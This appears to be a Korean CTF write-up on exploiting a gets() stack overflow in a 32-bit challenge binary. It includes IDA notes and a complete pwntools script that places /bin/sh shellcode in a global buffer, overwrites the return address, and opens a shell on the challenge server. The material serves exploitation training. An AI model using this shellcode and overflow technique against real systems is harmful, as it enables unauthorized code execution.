I"-<p>다운받은 파일을 IDA로 실행시켰다.</p>

<p><img src="https://user-images.githubusercontent.com/51374792/62381526-a8939480-b586-11e9-9f8f-19afbb59912e.png" alt="IDA - prob1 C__Users_이현우_Downloads_prob1 2019-08-03 오전 12_33_46 (2)" /></p>

<p>name을 read 함수로 입력받고, s를 gets로 입력받는다.</p>

<p>s는 0x14=20이다.</p>

<p>그러면, read에 쉘 코드를 넣어둔 뒤, read의 주소를 s가 입력받을 때의 RET에 넣어주자.</p>

<p>주소를 찾아보자.</p>

<p><img width="252" alt="캡처" src="https://user-images.githubusercontent.com/51374792/62382322-49cf1a80-b588-11e9-8944-cc67e80ed6c0.PNG" /></p>

<p>이걸 보면, main+3에서 0x14만큼 스택이 형성되는 것을 알 수 있다.</p>

<p>그러므로 dummy는 없다고 생각하자.</p>

<p>main+41에서 name의 주소가 나온다.</p>

<p>name의 주소 : 0x0804a060</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/python
</span><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'ctf.j0n9hyun.xyz'</span><span class="p">,</span><span class="mi">3003</span><span class="p">)</span>

<span class="n">shellcode</span><span class="o">=</span><span class="s">"</span><span class="se">\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80</span><span class="s">"</span>
<span class="n">ret</span><span class="o">=</span><span class="s">"</span><span class="se">\x60\xa0\x04\x08</span><span class="s">"</span>
<span class="n">code</span><span class="o">=</span><span class="s">"A"</span><span class="o">*</span><span class="mi">24</span> <span class="c1">#s(20)+SFP(4)
</span><span class="n">code</span><span class="o">+=</span><span class="n">ret</span>

<span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Name : "</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">shellcode</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"input : "</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">code</span><span class="p">)</span>

<span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
<span class="n">p</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></div></div>
:ET